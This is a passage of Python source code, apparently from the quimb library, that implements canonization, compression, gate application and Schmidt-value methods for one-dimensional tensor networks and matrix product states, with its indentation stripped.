"""An ordered tuple of the actual upper physical indices.
"""
return tuple(map(self.upper_ind, self.gen_site_coos()))
def to_dense(self, *inds_seq, **contract_opts):
"""Return the dense matrix version of this 1D operator, i.e. a
``qarray`` with shape (d, d).
"""
if not inds_seq:
inds_seq = (self.upper_inds, self.lower_inds)
return TensorNetwork.to_dense(self, *inds_seq, **contract_opts)
def phys_dim(self, i=None, which='upper'):
"""Get a physical index size of this 1D operator.
"""
if i is None:
i = next(iter(self.gen_site_coos()))
if which == 'upper':
return self[i].ind_size(self.upper_ind(i))
if which == 'lower':
return self[i].ind_size(self.lower_ind(i))
def set_default_compress_mode(opts, cyclic=False):
opts.setdefault('cutoff_mode', 'rel' if cyclic else 'rsum2')
class TensorNetwork1DFlat(TensorNetwork1D,
TensorNetwork):
"""1D Tensor network which has a flat structure.
"""
_EXTRA_PROPS = ('_site_tag_id', '_L')
def _left_decomp_site(self, i, bra=None, **split_opts):
T1, T2 = self[i], self[i + 1]
rix, lix = T1.filter_bonds(T2)
set_default_compress_mode(split_opts, self.cyclic)
Q, R = T1.split(lix, get='tensors', right_inds=rix, **split_opts)
R = R @ T2
Q.transpose_like_(T1)
R.transpose_like_(T2)
self[i].modify(data=Q.data)
self[i + 1].modify(data=R.data)
if bra is not None:
bra[i].modify(data=Q.data.conj())
bra[i + 1].modify(data=R.data.conj())
def _right_decomp_site(self, i, bra=None, **split_opts):
T1, T2 = self[i], self[i - 1]
lix, rix = T1.filter_bonds(T2)
set_default_compress_mode(split_opts, self.cyclic)
L, Q = T1.split(lix, get='tensors', right_inds=rix, **split_opts)
L = T2 @ L
L.transpose_like_(T2)
Q.transpose_like_(T1)
self[i - 1].modify(data=L.data)
self[i].modify(data=Q.data)
if bra is not None:
bra[i - 1].modify(data=L.data.conj())
bra[i].modify(data=Q.data.conj())
def left_canonize_site(self, i, bra=None):
r"""Left canonize this TN's ith site, inplace::
i i
-o-o- ->-s-
... | | ... ==> ... | | ...
Parameters
----------
i : int
Which site to canonize. The site at i + 1 also absorbs the
non-isometric part of the decomposition of site i.
bra : None or matching TensorNetwork to self, optional
If set, also update this TN's data with the conjugate canonization.
"""
self._left_decomp_site(i, bra=bra, method='qr')
def right_canonize_site(self, i, bra=None):
r"""Right canonize this TN's ith site, inplace::
i i
-o-o- -s-<-
... | | ... ==> ... | | ...
Parameters
----------
i : int
Which site to canonize. The site at i - 1 also absorbs the
non-isometric part of the decomposition of site i.
bra : None or matching TensorNetwork to self, optional
If set, also update this TN's data with the conjugate canonization.
"""
self._right_decomp_site(i, bra=bra, method='lq')
def left_canonize(self, stop=None, start=None, normalize=False, bra=None):
r"""Left canonize all or a portion of this TN. If this is a MPS,
this implies that::
i i
>->->->->->->-o-o- +-o-o-
| | | | | | | | | ... => | | | ...
>->->->->->->-o-o- +-o-o-
Parameters
----------
start : int, optional
If given, the site to start left canonizing at.
stop : int, optional
If given, the site to stop left canonizing at.
normalize : bool, optional
Whether to normalize the state, only works for OBC.
bra : MatrixProductState, optional
If supplied, simultaneously left canonize this MPS too, assuming it
to be the conjugate state.
"""
if start is None:
start = -1 if self.cyclic else 0
if stop is None:
stop = self.L - 1
for i in range(start, stop):
self.left_canonize_site(i, bra=bra)
if normalize:
factor = self[-1].norm()
self[-1] /= factor
if bra is not None:
bra[-1] /= factor
def right_canonize(self, stop=None, start=None, normalize=False, bra=None):
r"""Right canonize all or a portion of this TN. If this is a MPS,
this implies that::
i i
-o-o-<-<-<-<-<-<-< -o-o-+
... | | | | | | | | | -> ... | | |
-o-o-<-<-<-<-<-<-< -o-o-+
Parameters
----------
start : int, optional
If given, the site to start right canonizing at.
stop : int, optional
If given, the site to stop right canonizing at.
normalize : bool, optional
Whether to normalize the state.
bra : MatrixProductState, optional
If supplied, simultaneously right canonize this MPS too, assuming
it to be the conjugate state.
"""
if start is None:
start = self.L - (0 if self.cyclic else 1)
if stop is None:
stop = 0
for i in range(start, stop, -1):
self.right_canonize_site(i, bra=bra)
if normalize:
factor = self[0].norm()
self[0] /= factor
if bra is not None:
bra[0] /= factor
def canonize_cyclic(self, i, bra=None, method='isvd', inv_tol=1e-10):
"""Bring this MatrixProductState into (possibly only approximate)
canonical form at site(s) ``i``.
Parameters
----------
i : int or slice
The site or range of sites to make canonical.
bra : MatrixProductState, optional
Simultaneously canonize this state as well, assuming it to be the
co-vector.
method : {'isvd', 'svds', ...}, optional
How to perform the lateral compression.
inv_tol : float, optional
Tolerance with which to invert the gauge.
"""
if isinstance(i, Integral):
start, stop = i, i + 1
elif isinstance(i, slice):
start, stop = i.start, i.stop
else:
start, stop = min(i), max(i) + 1
if tuple(i) != tuple(range(start, stop)):
raise ValueError("Parameter ``i`` should be an integer or "
f"contiguous block of integers, got {i}.")
k = self.copy()
b = k.H
k.add_tag('_KET')
b.add_tag('_BRA')
kb = k & b
# approximate the rest of the chain with a separable transfer operator
kbc = kb.replace_section_with_svd(start, stop, eps=0.0, which='!any',
method=method, max_bond=1,
ltags='_LEFT', rtags='_RIGHT')
EL = kbc['_LEFT'].squeeze()
# explicitly symmetrize to hermitian
EL.modify(data=(EL.data + dag(EL.data)) / 2)
# split into upper 'ket' part and lower 'bra' part, symmetric
EL_lix, = EL.bonds(kbc[k.site_tag(start), '_BRA'])
_, x = EL.split(EL_lix, method='eigh', cutoff=-1, get='arrays')
ER = kbc['_RIGHT'].squeeze()
# explicitly symmetrize to hermitian
ER.modify(data=(ER.data + dag(ER.data)) / 2)
# split into upper 'ket' part and lower 'bra' part, symmetric
ER_lix, = ER.bonds(kbc[k.site_tag(stop - 1), '_BRA'])
_, y = ER.split(ER_lix, method='eigh', cutoff=-1, get='arrays')
self.insert_gauge(x, start - 1, start, tol=inv_tol)
self.insert_gauge(y, stop, stop - 1, tol=inv_tol)
if bra is not None:
for i in (start - 1, start, stop, stop - 1):
bra[i].modify(data=self[i].data.conj())
def shift_orthogonality_center(self, current, new, bra=None):
"""Move the orthogonality center of this MPS.
Parameters
----------
current : int
The current orthogonality center.
new : int
The target orthogonality center.
bra : MatrixProductState, optional
If supplied, simultaneously move the orthogonality center of this
MPS too, assuming it to be the conjugate state.
"""
if new > current:
for i in range(current, new):
self.left_canonize_site(i, bra=bra)
else:
for i in range(current, new, -1):
self.right_canonize_site(i, bra=bra)
def canonize(self, where, cur_orthog='calc', bra=None):
r"""Mixed canonize this TN. If this is a MPS, this implies that::
i i
>->->->->- ->-o-<- -<-<-<-<-< +-o-+
| | | | |...| | |...| | | | | -> | | |
>->->->->- ->-o-<- -<-<-<-<-< +-o-+
You can also supply a set of indices to orthogonalize around, and a
current location of the orthogonality center for efficiency::
current where
....... .....
>->->-c-c-c-c-<-<-<-<-<-< >->->->->->-w-w-w-<-<-<-<
| | | | | | | | | | | | | -> | | | | | | | | | | | | |
>->->-c-c-c-c-<-<-<-<-<-< >->->->->->-w-w-w-<-<-<-<
cmin cmax i j
This would only move ``cmin`` to ``i`` and ``cmax`` to ``j`` if
necessary.
Parameters
----------
where : int or sequence of int
Which site(s) to orthogonalize around. If a sequence of int then
make sure that section from min(where) to max(where) is orthog.
cur_orthog : int, sequence of int, or 'calc'
If given, the current site(s), so as to shift the orthogonality
center as efficiently as possible. If 'calc', calculate the
current orthogonality center.
bra : MatrixProductState, optional
If supplied, simultaneously mixed canonize this MPS too, assuming
it to be the conjugate state.
"""
if isinstance(where, int):
i = j = where
else:
i, j = min(where), max(where)
if cur_orthog == 'calc':
cur_orthog = self.calc_current_orthog_center()
if cur_orthog is not None:
if isinstance(cur_orthog, int):
cmin = cmax = cur_orthog
else:
cmin, cmax = min(cur_orthog), max(cur_orthog)
if cmax > j:
self.shift_orthogonality_center(cmax, j, bra=bra)
if cmin < i:
self.shift_orthogonality_center(cmin, i, bra=bra)
else:
self.left_canonize(i, bra=bra)
self.right_canonize(j, bra=bra)
return self
def left_compress_site(self, i, bra=None, **compress_opts):
"""Left compress this 1D TN's ith site, such that the site is then
left unitary with its right bond (possibly) reduced in dimension.
Parameters
----------
i : int
Which site to compress.
bra : None or matching TensorNetwork to self, optional
If set, also update this TN's data with the conjugate compression.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
compress_opts.setdefault('absorb', 'right')
self._left_decomp_site(i, bra=bra, **compress_opts)
def right_compress_site(self, i, bra=None, **compress_opts):
"""Right compress this 1D TN's ith site, such that the site is then
right unitary with its left bond (possibly) reduced in dimension.
Parameters
----------
i : int
Which site to compress.
bra : None or matching TensorNetwork to self, optional
If set, update this TN's data with the conjugate compression.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
compress_opts.setdefault('absorb', 'left')
self._right_decomp_site(i, bra=bra, **compress_opts)
def left_compress(self, start=None, stop=None, bra=None, **compress_opts):
"""Compress this 1D TN, from left to right, such that it becomes
left-canonical (unless ``absorb != 'right'``).
Parameters
----------
start : int, optional
Site to begin compressing on.
stop : int, optional
Site to stop compressing at (won't itself be an isometry).
bra : None or TensorNetwork like this one, optional
If given, update this TN as well, assuming it to be the conjugate.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
if start is None:
start = -1 if self.cyclic else 0
if stop is None:
stop = self.L - 1
for i in range(start, stop):
self.left_compress_site(i, bra=bra, **compress_opts)
def right_compress(self, start=None, stop=None, bra=None, **compress_opts):
"""Compress this 1D TN, from right to left, such that it becomes
right-canonical (unless ``absorb != 'left'``).
Parameters
----------
start : int, optional
Site to begin compressing on.
stop : int, optional
Site to stop compressing at (won't itself be an isometry).
bra : None or TensorNetwork like this one, optional
If given, update this TN as well, assuming it to be the conjugate.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
if start is None:
start = self.L - (0 if self.cyclic else 1)
if stop is None:
stop = 0
for i in range(start, stop, -1):
self.right_compress_site(i, bra=bra, **compress_opts)
def compress(self, form=None, **compress_opts):
"""Compress this 1D Tensor Network, possibly into canonical form.
Parameters
----------
form : {None, 'flat', 'left', 'right'} or int
Output form of the TN. ``None`` left canonizes the state first for
stability reasons, then right_compresses (default). ``'flat'``
tries to distribute the singular values evenly -- state will not
be canonical. ``'left'`` and ``'right'`` put the state into left
and right canonical form respectively with a prior opposite sweep,
or an int will put the state into mixed canonical form at that
site.
compress_opts
Supplied to :meth:`Tensor.split`.
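        Examples
        --------
        A rough sketch, assuming ``MPS_rand_state`` from ``quimb.tensor``;
        ``max_bond`` is just one possible ``Tensor.split`` option::
            psi = MPS_rand_state(20, bond_dim=50)
            psi.compress(form='right', max_bond=16)  # right-canonical, chi <= 16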
"""
if form is None:
form = 'right'
if isinstance(form, Integral):
self.right_canonize()
self.left_compress(**compress_opts)
self.right_canonize(stop=form)
elif form == 'left':
self.right_canonize(bra=compress_opts.get('bra', None))
self.left_compress(**compress_opts)
elif form == 'right':
self.left_canonize(bra=compress_opts.get('bra', None))
self.right_compress(**compress_opts)
elif form == 'flat':
compress_opts['absorb'] = 'both'
self.right_compress(stop=self.L // 2, **compress_opts)
self.left_compress(stop=self.L // 2, **compress_opts)
else:
raise ValueError(f"Form specifier {form} not understood, should be"
" either 'left', 'right', 'flat' or an int "
"specifiying a new orthog center.")
def compress_site(self, i, canonize=True, cur_orthog='calc', bra=None,
**compress_opts):
r"""Compress the bonds adjacent to site ``i``, by default first setting
the orthogonality center to that site::
i i
-o-o-o-o-o- --> ->->~o~<-<-
| | | | | | | | | |
Parameters
----------
i : int
Which site to compress around
canonize : bool, optional
Whether to first set the orthogonality center to site ``i``.
cur_orthog : int, optional
If given, the known current orthogonality center, to speed up the
mixed canonization.
bra : MatrixProductState, optional
The conjugate state to also apply the compression to.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split`.
"""
if canonize:
self.canonize(i, cur_orthog=cur_orthog, bra=bra)
if self.cyclic or i > 0:
self.left_compress_site(i - 1, bra=bra, **compress_opts)
if self.cyclic or i < self.L - 1:
self.right_compress_site(i + 1, bra=bra, **compress_opts)
def bond(self, i, j):
"""Get the name of the index defining the bond between sites i and j.
"""
bond, = self[i].bonds(self[j])
return bond
def bond_size(self, i, j):
"""Return the size of the bond between site ``i`` and ``j``.
"""
b_ix = self.bond(i, j)
return self[i].ind_size(b_ix)
def bond_sizes(self):
bnd_szs = [self.bond_size(i, i + 1) for i in range(self.L - 1)]
if self.cyclic:
bnd_szs.append(self.bond_size(-1, 0))
return bnd_szs
def singular_values(self, i, cur_orthog=None, method='svd'):
r"""Find the singular values associated with the ith bond::
....L.... i
o-o-o-o-o-l-o-o-o-o-o-o-o-o-o-o-o
| | | | | | | | | | | | | | | |
i-1 ..........R..........
        Leaves the 1D TN in mixed canonical form at bond ``i``.
Parameters
----------
i : int
Which bond, or equivalently, the number of sites in the
left partition.
cur_orthog : int
If given, the known current orthogonality center, to speed up the
mixed canonization, e.g. if sweeping this function from left to
right would use ``i - 1``.
Returns
-------
svals : 1d-array
The singular values.
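        Examples
        --------
        A rough sketch of sweeping the singular values across every bond,
        reusing the orthogonality center each time (assuming
        ``MPS_rand_state`` from ``quimb.tensor``, illustrative only)::
            psi = MPS_rand_state(10, bond_dim=7)
            psi.canonize(0)
            svals = [psi.singular_values(i, cur_orthog=i - 1)
                     for i in range(1, psi.L)]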
"""
if not (0 < i < self.L):
raise ValueError(f"Need 0 < i < {self.L}, got i={i}.")
self.canonize(i, cur_orthog)
Tm1 = self[i]
left_inds = Tm1.bonds(self[i - 1])
return Tm1.singular_values(left_inds, method=method)
def expand_bond_dimension(
self,
new_bond_dim,
rand_strength=0.0,
bra=None,
inplace=True,
):
"""Expand the bond dimensions of this 1D tensor network to at least
``new_bond_dim``.
Parameters
----------
new_bond_dim : int
Minimum bond dimension to expand to.
inplace : bool, optional
Whether to perform the expansion in place.
bra : MatrixProductState, optional
Mirror the changes to ``bra`` inplace, treating it as the conjugate
state.
rand_strength : float, optional
If ``rand_strength > 0``, fill the new tensor entries with gaussian
noise of strength ``rand_strength``.
Returns
-------
MatrixProductState
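        Examples
        --------
        A minimal sketch, assuming ``MPS_rand_state`` from ``quimb.tensor``
        (illustrative only)::
            psi = MPS_rand_state(10, bond_dim=2)
            psi.expand_bond_dimension(8, rand_strength=0.01)
            psi.max_bond()  # now 8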
"""
tn = super().expand_bond_dimension(
new_bond_dim=new_bond_dim,
rand_strength=rand_strength,
inplace=inplace,
)
if bra is not None:
for coo in tn.gen_site_coos():
bra[coo].modify(data=tn[coo].data.conj())
return tn
def count_canonized(self):
if self.cyclic:
return 0, 0
ov = self.H & self
num_can_l = 0
num_can_r = 0
def isidentity(x):
d = x.shape[0]
if get_dtype_name(x) in ('float32', 'complex64'):
rtol, atol = 1e-5, 1e-6
else:
rtol, atol = 1e-9, 1e-11
idtty = do('eye', d, dtype=x.dtype, like=x)
return do('allclose', x, idtty, rtol=rtol, atol=atol)
for i in range(self.L - 1):
ov ^= slice(max(0, i - 1), i + 1)
x = ov[i].data
if isidentity(x):
num_can_l += 1
else:
break
for j in reversed(range(i + 1, self.L)):
ov ^= slice(j, min(self.L, j + 2))
x = ov[j].data
if isidentity(x):
num_can_r += 1
else:
break
return num_can_l, num_can_r
def calc_current_orthog_center(self):
"""Calculate the site(s) of the current orthogonality center.
Returns
-------
int or (int, int)
The site, or min/max, around which this MPS is orthogonal.
"""
lo, ro = self.count_canonized()
i, j = lo, self.L - ro - 1
        return i if i == j else (i, j)
def as_cyclic(self, inplace=False):
"""Convert this flat, 1D, TN into cyclic form by adding a dummy bond
between the first and last sites.
"""
tn = self if inplace else self.copy()
# nothing to do
if tn.cyclic:
return tn
tn.new_bond(0, -1)
tn.cyclic = True
return tn
def show(self, max_width=None):
l1 = ""
l2 = ""
l3 = ""
num_can_l, num_can_r = self.count_canonized()
for i in range(self.L - 1):
bdim = self.bond_size(i, i + 1)
strl = len(str(bdim))
l1 += f" {bdim}"
l2 += (">" if i < num_can_l else
"<" if i >= self.L - num_can_r else
"●") + ("─" if bdim < 100 else "━") * strl
l3 += "│" + " " * strl
strl = len(str(bdim))
l1 += " "
l2 += "<" if num_can_r > 0 else "●"
l3 += "│"
if self.cyclic:
bdim = self.bond_size(0, self.L - 1)
bnd_str = ("─" if bdim < 100 else "━") * strl
l1 = f" {bdim}{l1}{bdim} "
l2 = f"+{bnd_str}{l2}{bnd_str}+"
l3 = f" {' ' * strl}{l3}{' ' * strl} "
print_multi_line(l1, l2, l3, max_width=max_width)
class MatrixProductState(TensorNetwork1DVector,
TensorNetwork1DFlat,
TensorNetwork1D,
TensorNetwork):
"""Initialise a matrix product state, with auto labelling and tagging.
Parameters
----------
arrays : sequence of arrays
The tensor arrays to form into a MPS.
shape : str, optional
String specifying layout of the tensors. E.g. 'lrp' (the default)
        indicates the shape corresponds to left-bond, right-bond, physical index.
End tensors have either 'l' or 'r' dropped from the string.
site_ind_id : str
        A string specifying how to label the physical site indices. Should
contain a ``'{}'`` placeholder. It is used to generate the actual
indices like: ``map(site_ind_id.format, range(len(arrays)))``.
site_tag_id : str
        A string specifying how to tag the tensors at each site. Should
contain a ``'{}'`` placeholder. It is used to generate the actual tags
like: ``map(site_tag_id.format, range(len(arrays)))``.
tags : str or sequence of str, optional
Global tags to attach to all tensors.
bond_name : str, optional
The base name of the bond indices, onto which uuids will be added.
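    Examples
    --------
    A rough sketch of building a small random open boundary MPS directly from
    arrays, using the default ``'lrp'`` shape convention (sizes here are
    illustrative only)::
        import numpy as np
        L, chi, d = 6, 4, 2
        arrays = ([np.random.randn(chi, d)] +
                  [np.random.randn(chi, chi, d) for _ in range(L - 2)] +
                  [np.random.randn(chi, d)])
        psi = MatrixProductState(arrays)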
"""
_EXTRA_PROPS = (
'_site_tag_id',
'_site_ind_id',
'cyclic',
'_L',
)
def __init__(self, arrays, *, shape='lrp', tags=None, bond_name="",
site_ind_id='k{}', site_tag_id='I{}', **tn_opts):
# short-circuit for copying MPSs
if isinstance(arrays, MatrixProductState):
super().__init__(arrays)
return
arrays = tuple(arrays)
self._L = len(arrays)
# process site indices
self._site_ind_id = site_ind_id
site_inds = map(site_ind_id.format, range(self.L))
# process site tags
self._site_tag_id = site_tag_id
site_tags = map(site_tag_id.format, range(self.L))
if tags is not None:
# mix in global tags
tags = tags_to_oset(tags)
site_tags = (tags | oset((st,)) for st in site_tags)
self.cyclic = (ops.ndim(arrays[0]) == 3)
# transpose arrays to 'lrp' order.
def gen_orders():
lp_ord = tuple(shape.replace('r', "").find(x) for x in 'lp')
lrp_ord = tuple(shape.find(x) for x in 'lrp')
rp_ord = tuple(shape.replace('l', "").find(x) for x in 'rp')
yield lp_ord if not self.cyclic else lrp_ord
for _ in range(self.L - 2):
yield lrp_ord
yield rp_ord if not self.cyclic else lrp_ord
def gen_inds():
cyc_bond = (rand_uuid(base=bond_name),) if self.cyclic else ()
nbond = rand_uuid(base=bond_name)
yield cyc_bond + (nbond, next(site_inds))
pbond = nbond
for _ in range(self.L - 2):
nbond = rand_uuid(base=bond_name)
yield (pbond, nbond, next(site_inds))
pbond = nbond
yield (pbond,) + cyc_bond + (next(site_inds),)
def gen_tensors():
for array, site_tag, inds, order in zip(arrays, site_tags,
gen_inds(), gen_orders()):
yield Tensor(transpose(array, order), inds=inds, tags=site_tag)
super().__init__(gen_tensors(), virtual=True, **tn_opts)
@classmethod
def from_dense(cls, psi, dims, site_ind_id='k{}',
site_tag_id='I{}', **split_opts):
"""Create a ``MatrixProductState`` directly from a dense vector
Parameters
----------
psi : array_like
The dense state to convert to MPS from.
dims : sequence of int
Physical subsystem dimensions of each site.
site_ind_id : str, optional
How to index the physical sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductState`.
site_tag_id : str, optional
How to tag the physical sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductState`.
split_opts
            Supplied to :func:`~quimb.tensor.tensor_core.tensor_split` in
            order to partition the dense vector into tensors.
Returns
-------
MatrixProductState
Examples
--------
>>> dims = [2, 2, 2, 2, 2, 2]
>>> psi = rand_ket(prod(dims))
>>> mps = MatrixProductState.from_dense(psi, dims)
>>> mps.show()
2 4 8 4 2
o-o-o-o-o-o
| | | | | |
"""
set_default_compress_mode(split_opts)
L = len(dims)
inds = [site_ind_id.format(i) for i in range(L)]
T = Tensor(reshape(ops.asarray(psi), dims), inds=inds)
def gen_tensors():
# split
# <-- : yield
# : :
# OOOOOOO--O-O-O
# ||||||| | | |
# .......
# left_inds
TM = T
for i in range(L - 1, 0, -1):
TM, TR = TM.split(left_inds=inds[:i], get='tensors',
rtags=site_tag_id.format(i), **split_opts)
yield TR
TM.add_tag(site_tag_id.format(0))
yield TM
tn = TensorNetwork(gen_tensors())
return cls.from_TN(tn, cyclic=False, L=L,
site_ind_id=site_ind_id,
site_tag_id=site_tag_id)
def add_MPS(self, other, inplace=False, compress=False, **compress_opts):
"""Add another MatrixProductState to this one.
"""
if self.L != other.L:
raise ValueError("Can't add MPS with another of different length.")
new_mps = self if inplace else self.copy()
for i in new_mps.gen_site_coos():
t1, t2 = new_mps[i], other[i]
if set(t1.inds) != set(t2.inds):
# Need to use bonds to match indices
reindex_map = {}
if i > 0 or self.cyclic:
pair = ((i - 1) % self.L, i)
reindex_map[other.bond(*pair)] = new_mps.bond(*pair)
if i < new_mps.L - 1 or self.cyclic:
pair = (i, (i + 1) % self.L)
reindex_map[other.bond(*pair)] = new_mps.bond(*pair)
t2 = t2.reindex(reindex_map)
t1.direct_product_(t2, sum_inds=new_mps.site_ind(i))
if compress:
new_mps.compress(**compress_opts)
return new_mps
add_MPS_ = functools.partialmethod(add_MPS, inplace=True)
def permute_arrays(self, shape='lrp'):
"""Permute the indices of each tensor in this MPS to match ``shape``.
This doesn't change how the overall object interacts with other tensor
networks but may be useful for extracting the underlying arrays
consistently. This is an inplace operation.
Parameters
----------
shape : str, optional
A permutation of ``'lrp'`` specifying the desired order of the
left, right, and physical indices respectively.
"""
for i in self.sites:
inds = {'p': self.site_ind(i)}
if self.cyclic or i > 0:
inds['l'] = self.bond(i, (i - 1) % self.L)
if self.cyclic or i < self.L - 1:
inds['r'] = self.bond(i, (i + 1) % self.L)
inds = [inds[s] for s in shape if s in inds]
self[i].transpose_(*inds)
def __add__(self, other):
"""MPS addition.
"""
return self.add_MPS(other, inplace=False)
def __iadd__(self, other):
"""In-place MPS addition.
"""
return self.add_MPS(other, inplace=True)
def __sub__(self, other):
"""MPS subtraction.
"""
return self.add_MPS(other * -1, inplace=False)
def __isub__(self, other):
"""In-place MPS subtraction.
"""
return self.add_MPS(other * -1, inplace=True)
def normalize(self, bra=None, eps=1e-15, insert=None):
"""Normalize this MPS, optional with co-vector ``bra``. For periodic
MPS this uses transfer matrix SVD approximation with precision ``eps``
in order to be efficient. Inplace.
Parameters
----------
bra : MatrixProductState, optional
If given, normalize this MPS with the same factor.
eps : float, optional
            If cyclic, the precision with which to approximate the transfer
            matrix. Default: 1e-15.
insert : int, optional
Insert the corrective normalization on this site, random if
not given.
Returns
-------
old_norm : float
The old norm ``self.H @ self``.
"""
norm = expec_TN_1D(self.H, self, eps=eps)
if insert is None:
insert = -1
self[insert].modify(data=self[insert].data / norm ** 0.5)
if bra is not None:
bra[insert].modify(data=bra[insert].data / norm ** 0.5)
return norm
def gate_split(self, G, where, inplace=False, **compress_opts):
r"""Apply a two-site gate and then split resulting tensor to retrieve a
MPS form::
-o-o-A-B-o-o-
| | | | | | -o-o-GGG-o-o- -o-o-X~Y-o-o-
| | GGG | | ==> | | | | | | ==> | | | | | |
| | | | | | i j i j
i j
As might be found in TEBD.
Parameters
----------
G : array
The gate, with shape ``(d**2, d**2)`` for physical dimension ``d``.
where : (int, int)
Indices of the sites to apply the gate to.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_split`.
See Also
--------
gate, gate_with_auto_swap
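        Examples
        --------
        A rough sketch of a single TEBD-like step, assuming ``qu.CNOT()`` for
        the gate and ``MPS_rand_state`` from ``quimb.tensor`` (illustrative
        only)::
            psi = MPS_rand_state(6, bond_dim=4)
            psi.canonize((2, 3))    # optional, for an optimal truncation
            psi.gate_split_(qu.CNOT(), (2, 3), max_bond=8)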
"""
tn = self if inplace else self.copy()
i, j = where
Ti, Tj = tn[i], tn[j]
ix_i, ix_j = tn.site_ind(i), tn.site_ind(j)
# Make Tensor of gate
d = tn.phys_dim(i)
TG = Tensor(reshape(ops.asarray(G), (d, d, d, d)),
inds=("_tmpi", "_tmpj", ix_i, ix_j))
# Contract gate into the two sites
TG = TG.contract(Ti, Tj)
TG.reindex_({"_tmpi": ix_i, "_tmpj": ix_j})
# Split the tensor
_, left_ix = Ti.filter_bonds(Tj)
set_default_compress_mode(compress_opts, self.cyclic)
nTi, nTj = TG.split(left_inds=left_ix, get='tensors', **compress_opts)
# make sure the new data shape matches and reinsert
Ti.modify(data=nTi.transpose_like_(Ti).data)
Tj.modify(data=nTj.transpose_like_(Tj).data)
return tn
gate_split_ = functools.partialmethod(gate_split, inplace=True)
def swap_sites_with_compress(self, i, j, cur_orthog=None,
inplace=False, **compress_opts):
"""Swap sites ``i`` and ``j`` by contracting, then splitting with the
physical indices swapped.
Parameters
----------
i : int
The first site to swap.
j : int
The second site to swap.
cur_orthog : int, sequence of int, or 'calc'
If known, the current orthogonality center.
        inplace : bool, optional
Perform the swaps inplace.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split`.
"""
i, j = sorted((i, j))
if i + 1 != j:
raise ValueError("Sites aren't adjacent.")
mps = self if inplace else self.copy()
mps.canonize((i, j), cur_orthog)
# get site tensors and indices
ix_i, ix_j = map(mps.site_ind, (i, j))
Ti, Tj = mps[i], mps[j]
_, unshared = Ti.filter_bonds(Tj)
# split the contracted tensor, swapping the site indices
Tij = Ti @ Tj
lix = [i for i in unshared if i != ix_i] + [ix_j]
set_default_compress_mode(compress_opts, self.cyclic)
sTi, sTj = Tij.split(lix, get='tensors', **compress_opts)
# reindex and transpose the tensors to directly update original tensors
sTi.reindex_({ix_j: ix_i})
sTj.reindex_({ix_i: ix_j})
sTi.transpose_like_(Ti)
sTj.transpose_like_(Tj)
Ti.modify(data=sTi.data)
Tj.modify(data=sTj.data)
return mps
def swap_site_to(self, i, f, cur_orthog=None,
inplace=False, **compress_opts):
r"""Swap site ``i`` to site ``f``, compressing the bond after each
swap::
i f
0 1 2 3 4 5 6 7 8 9 0 1 2 4 5 6 7 3 8 9
o-o-o-x-o-o-o-o-o-o o-o-o-o-o-o-o-x-o-o
| | | | | | | | | | -> | | | | | | | | | |
Parameters
----------
i : int
The site to move.
f : int
The new location for site ``i``.
cur_orthog : int, sequence of int, or 'calc'
If known, the current orthogonality center.
        inplace : bool, optional
Perform the swaps inplace.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split`.
"""
mps = self if inplace else self.copy()
if i == f:
return mps
if i < f:
js = range(i, f)
if f < i:
js = range(i - 1, f - 1, -1)
for j in js:
mps.swap_sites_with_compress(
j, j + 1, inplace=True, cur_orthog=cur_orthog, **compress_opts)
cur_orthog = (j, j + 1)
return mps
def gate_with_auto_swap(self, G, where, inplace=False,
cur_orthog=None, **compress_opts):
"""Perform a two site gate on this MPS by, if necessary, swapping and
compressing the sites until they are adjacent, using ``gate_split``,
then unswapping the sites back to their original position.
Parameters
----------
G : array
The gate, with shape ``(d**2, d**2)`` for physical dimension ``d``.
where : (int, int)
Indices of the sites to apply the gate to.
cur_orthog : int, sequence of int, or 'calc'
If known, the current orthogonality center.
        inplace : bool, optional
Perform the swaps inplace.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split`.
See Also
--------
gate, gate_split
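        Examples
        --------
        A rough sketch for a non-adjacent pair of sites, assuming
        ``qu.CNOT()`` for the gate and ``MPS_rand_state`` from
        ``quimb.tensor`` (illustrative only)::
            psi = MPS_rand_state(10, bond_dim=8)
            psi.gate_with_auto_swap(qu.CNOT(), (2, 6), inplace=True, max_bond=16)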
"""
mps = self if inplace else self.copy()
i, j = sorted(where)
need2swap = i + 1 != j
# move j site adjacent to i site
if need2swap:
mps.swap_site_to(j, i + 1, cur_orthog=cur_orthog,
inplace=True, **compress_opts)
cur_orthog = (i + 1, i + 2)
# make sure sites are orthog center, then apply and split
mps.canonize((i, i + 1), cur_orthog)
mps.gate_split_(G, (i, i + 1), **compress_opts)
# move j site back to original position
if need2swap:
mps.swap_site_to(i + 1, j, cur_orthog=(i, i + 1),
inplace=True, **compress_opts, )
return mps
def magnetization(self, i, direction='Z', cur_orthog=None):
"""Compute the magnetization at site ``i``.
"""
if self.cyclic:
msg = ("``magnetization`` currently makes use of orthogonality for"
" efficiencies sake, for cyclic systems is it still "
"possible to compute as a normal expectation.")
raise NotImplementedError(msg)
self.canonize(i, cur_orthog)
# +-k-+
# | O |
# +-b-+
Tk = self[i]
ind1, ind2 = self.site_ind(i), '__tmp__'
Tb = Tk.H.reindex({ind1: ind2})
O_data = qu.spin_operator(direction, S=(self.phys_dim(i) - 1) / 2)
TO = Tensor(O_data, inds=(ind1, ind2))
return Tk.contract(TO, Tb)
def schmidt_values(self, i, cur_orthog=None, method='svd'):
r"""Find the schmidt values associated with the bipartition of this
        MPS between sites on either side of ``i``. In other words, ``i`` is the
number of sites in the left hand partition::
....L.... i
o-o-o-o-o-S-o-o-o-o-o-o-o-o-o-o-o
| | | | | | | | | | | | | | | |
i-1 ..........R..........
The schmidt values, ``S``, are the singular values associated with the
``(i - 1, i)`` bond, squared, provided the MPS is mixed canonized at
one of those sites.
Parameters
----------
i : int
The number of sites in the left partition.
cur_orthog : int
If given, the known current orthogonality center, to speed up the
mixed canonization.
Returns
-------
S : 1d-array
The schmidt values.
"""
if self.cyclic:
raise NotImplementedError
return self.singular_values(i, cur_orthog, method=method)**2
def entropy(self, i, cur_orthog=None, method='svd'):
"""The entropy of bipartition between the left block of ``i`` sites and
the rest.
Parameters
----------
i : int
The number of sites in the left partition.
cur_orthog : int
